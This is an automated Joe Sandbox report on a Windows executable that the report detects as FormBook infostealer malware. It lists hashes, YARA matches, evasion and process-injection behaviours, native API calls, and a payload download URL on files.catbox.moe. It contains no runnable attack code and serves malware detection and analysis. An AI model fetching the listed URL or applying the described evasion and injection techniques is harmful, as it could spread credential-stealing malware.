Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1562756
MD5:0a089e934eb856c3e809d0fac53000c7
SHA1:661f86072031587be18ada0b6606ee82bb52038f
SHA256:f4e5ec593dcb18dca253d98f5133050e96f27f86c1e46b5882abf797fefe26b1
Tags:exeuser-Bitsight
Infos:

Detection

FormBook
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1984 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0A089E934EB856C3E809D0FAC53000C7)
    • file.exe (PID: 528 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0A089E934EB856C3E809D0FAC53000C7)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.2111813386.000000000274A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000002.00000002.2217550179.00000000015C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000000.00000002.2133396929.0000000006A50000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          Process Memory Space: file.exe PID: 1984JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            2.2.file.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.file.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                0.2.file.exe.6a50000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  No Sigma rule has matched
                  No Suricata rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: file.exeReversingLabs: Detection: 21%
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2217550179.00000000015C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: file.exeJoe Sandbox ML: detected
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.2133930517.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000037D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000036A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: file.exe, 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.2133930517.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000037D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000036A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 069A2192h0_2_069A1F90
                  Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 069A2192h0_2_069A1F80
                  Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 069A7FCAh0_2_069A7F51
                  Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 069A7FCAh0_2_069A7F60
                  Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 069A9C73h0_2_069A9580
                  Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 069A7FCAh0_2_069A8105
                  Source: global trafficHTTP traffic detected: GET /ne8lox.mp4 HTTP/1.1Host: files.catbox.moeConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 108.181.20.35 108.181.20.35
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /ne8lox.mp4 HTTP/1.1Host: files.catbox.moeConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: files.catbox.moe
                  Source: file.exe, 00000000.00000002.2111813386.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: file.exe, 00000000.00000002.2111813386.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe
                  Source: file.exe, 00000000.00000002.2111813386.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/ne8lox.mp4
                  Source: file.exeString found in binary or memory: https://files.catbox.moe/ne8lox.mp41OWRumaBvqxiIWy/UyUzNnQ==
                  Source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2111813386.000000000274A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.5:49704 version: TLS 1.2

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2217550179.00000000015C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C7728 NtProtectVirtualMemory,0_2_069C7728
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C9888 NtResumeThread,0_2_069C9888
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C7720 NtProtectVirtualMemory,0_2_069C7720
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C9880 NtResumeThread,0_2_069C9880
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042C7A3 NtClose,2_2_0042C7A3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01692DF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01692C70
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016935C0 NtCreateMutant,LdrInitializeThunk,2_2_016935C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01694340 NtSetContextThread,2_2_01694340
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01694650 NtSuspendThread,2_2_01694650
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692B60 NtClose,2_2_01692B60
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692BE0 NtQueryValueKey,2_2_01692BE0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692BF0 NtAllocateVirtualMemory,2_2_01692BF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692BA0 NtEnumerateValueKey,2_2_01692BA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692B80 NtQueryInformationFile,2_2_01692B80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692AF0 NtWriteFile,2_2_01692AF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692AD0 NtReadFile,2_2_01692AD0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692AB0 NtWaitForSingleObject,2_2_01692AB0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692D30 NtUnmapViewOfSection,2_2_01692D30
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692D00 NtSetInformationFile,2_2_01692D00
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692D10 NtMapViewOfSection,2_2_01692D10
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692DD0 NtDelayExecution,2_2_01692DD0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692DB0 NtEnumerateKey,2_2_01692DB0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692C60 NtCreateKey,2_2_01692C60
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692C00 NtQueryInformationProcess,2_2_01692C00
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692CF0 NtOpenProcess,2_2_01692CF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692CC0 NtQueryVirtualMemory,2_2_01692CC0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692CA0 NtQueryInformationToken,2_2_01692CA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692F60 NtCreateProcessEx,2_2_01692F60
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692F30 NtCreateSection,2_2_01692F30
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692FE0 NtCreateFile,2_2_01692FE0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692FA0 NtQuerySection,2_2_01692FA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692FB0 NtResumeThread,2_2_01692FB0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692F90 NtProtectVirtualMemory,2_2_01692F90
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692E30 NtWriteVirtualMemory,2_2_01692E30
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692EE0 NtQueueApcThread,2_2_01692EE0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692EA0 NtAdjustPrivilegesToken,2_2_01692EA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692E80 NtReadVirtualMemory,2_2_01692E80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01693010 NtOpenDirectoryObject,2_2_01693010
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01693090 NtSetValueKey,2_2_01693090
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016939B0 NtGetContextThread,2_2_016939B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01693D70 NtOpenThread,2_2_01693D70
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01693D10 NtOpenProcessToken,2_2_01693D10
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_024ECFE40_2_024ECFE4
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_068F07D80_2_068F07D8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_068FF3680_2_068FF368
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069936200_2_06993620
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0699B79E0_2_0699B79E
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0699B6F10_2_0699B6F1
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069936100_2_06993610
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0699C7800_2_0699C780
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0699C7700_2_0699C770
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06992A300_2_06992A30
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06992A400_2_06992A40
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069923100_2_06992310
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069923000_2_06992300
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06993B290_2_06993B29
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069A425D0_2_069A425D
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069A77580_2_069A7758
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069A7F510_2_069A7F51
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069A7F600_2_069A7F60
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069A62500_2_069A6250
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069A624A0_2_069A624A
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069A81050_2_069A8105
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C42600_2_069C4260
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C74800_2_069C7480
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069CAA540_2_069CAA54
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C42500_2_069C4250
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069CAB1D0_2_069CAB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069CAB350_2_069CAB35
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069CA7500_2_069CA750
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069CA7410_2_069CA741
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C74700_2_069C7470
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069CADB80_2_069CADB8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069CADA90_2_069CADA9
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069D4CFA0_2_069D4CFA
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069D666B0_2_069D666B
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069D39E80_2_069D39E8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069D00060_2_069D0006
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069D00400_2_069D0040
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069DA7B80_2_069DA7B8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069DA7A80_2_069DA7A8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069D39D90_2_069D39D9
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CA35B00_2_06CA35B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CA00400_2_06CA0040
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CA12480_2_06CA1248
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CA03670_2_06CA0367
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06E4E6C00_2_06E4E6C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06E4E2A00_2_06E4E2A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004028C02_2_004028C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004101332_2_00410133
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004031D02_2_004031D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00416A2E2_2_00416A2E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00416A332_2_00416A33
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004103532_2_00410353
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040E3D32_2_0040E3D3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004025302_2_00402530
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042EDD32_2_0042EDD3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E81582_2_016E8158
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016501002_2_01650100
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FA1182_2_016FA118
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_017181CC2_2_017181CC
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_017141A22_2_017141A2
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_017201AA2_2_017201AA
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F20002_2_016F2000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171A3522_2_0171A352
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_017203E62_2_017203E6
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166E3F02_2_0166E3F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_017002742_2_01700274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E02C02_2_016E02C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016605352_2_01660535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_017205912_2_01720591
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_017124462_2_01712446
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_017044202_2_01704420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0170E4F62_2_0170E4F6
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016607702_2_01660770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016847502_2_01684750
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165C7C02_2_0165C7C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167C6E02_2_0167C6E0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016769622_2_01676962
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016629A02_2_016629A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0172A9A62_2_0172A9A6
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016628402_2_01662840
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166A8402_2_0166A840
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168E8F02_2_0168E8F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016468B82_2_016468B8
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171AB402_2_0171AB40
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01716BD72_2_01716BD7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165EA802_2_0165EA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166AD002_2_0166AD00
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FCD1F2_2_016FCD1F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165ADE02_2_0165ADE0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01678DBF2_2_01678DBF
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660C002_2_01660C00
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01650CF22_2_01650CF2
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01700CB52_2_01700CB5
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D4F402_2_016D4F40
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01702F302_2_01702F30
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016A2F282_2_016A2F28
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01680F302_2_01680F30
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166CFE02_2_0166CFE0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01652FC82_2_01652FC8
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016DEFA02_2_016DEFA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660E592_2_01660E59
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171EE262_2_0171EE26
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171EEDB2_2_0171EEDB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171CE932_2_0171CE93
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01672E902_2_01672E90
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0169516C2_2_0169516C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164F1722_2_0164F172
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0172B16B2_2_0172B16B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166B1B02_2_0166B1B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171F0E02_2_0171F0E0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_017170E92_2_017170E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016670C02_2_016670C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0170F0CC2_2_0170F0CC
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164D34C2_2_0164D34C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171132D2_2_0171132D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016A739A2_2_016A739A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_017012ED2_2_017012ED
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167B2C02_2_0167B2C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016652A02_2_016652A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_017175712_2_01717571
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FD5B02_2_016FD5B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016514602_2_01651460
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171F43F2_2_0171F43F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171F7B02_2_0171F7B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_017116CC2_2_017116CC
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016699502_2_01669950
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167B9502_2_0167B950
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F59102_2_016F5910
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CD8002_2_016CD800
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016638E02_2_016638E0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171FB762_2_0171FB76
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0169DBF92_2_0169DBF9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D5BF02_2_016D5BF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167FB802_2_0167FB80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D3A6C2_2_016D3A6C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01717A462_2_01717A46
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171FA492_2_0171FA49
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0170DAC62_2_0170DAC6
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FDAAC2_2_016FDAAC
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016A5AA02_2_016A5AA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01701AA32_2_01701AA3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01717D732_2_01717D73
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01663D402_2_01663D40
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01711D5A2_2_01711D5A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167FDC02_2_0167FDC0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D9C322_2_016D9C32
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171FCF22_2_0171FCF2
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171FF092_2_0171FF09
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171FFB12_2_0171FFB1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01661F922_2_01661F92
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01669EB02_2_01669EB0
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 0164B970 appears 280 times
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 016CEA12 appears 86 times
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 016A7E54 appears 102 times
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 016DF290 appears 105 times
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 01695130 appears 58 times
                  Source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
                  Source: file.exe, 00000000.00000002.2111813386.00000000026F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs file.exe
                  Source: file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
